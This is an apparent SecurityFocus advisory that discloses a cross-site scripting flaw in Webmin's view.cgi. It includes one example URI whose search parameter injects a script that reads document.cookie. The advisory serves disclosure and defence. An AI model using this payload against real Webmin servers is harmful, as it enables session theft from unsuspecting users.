Webmin 'view.cgi' Cross Site Scripting Vulnerability

Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

The following example URI is available:

https://www.example.com/webminlog/view.cgi?id=1&search=e"><script>alert(document.cookie);</script>


 

Privacy Statement
Copyright 2010, SecurityFocus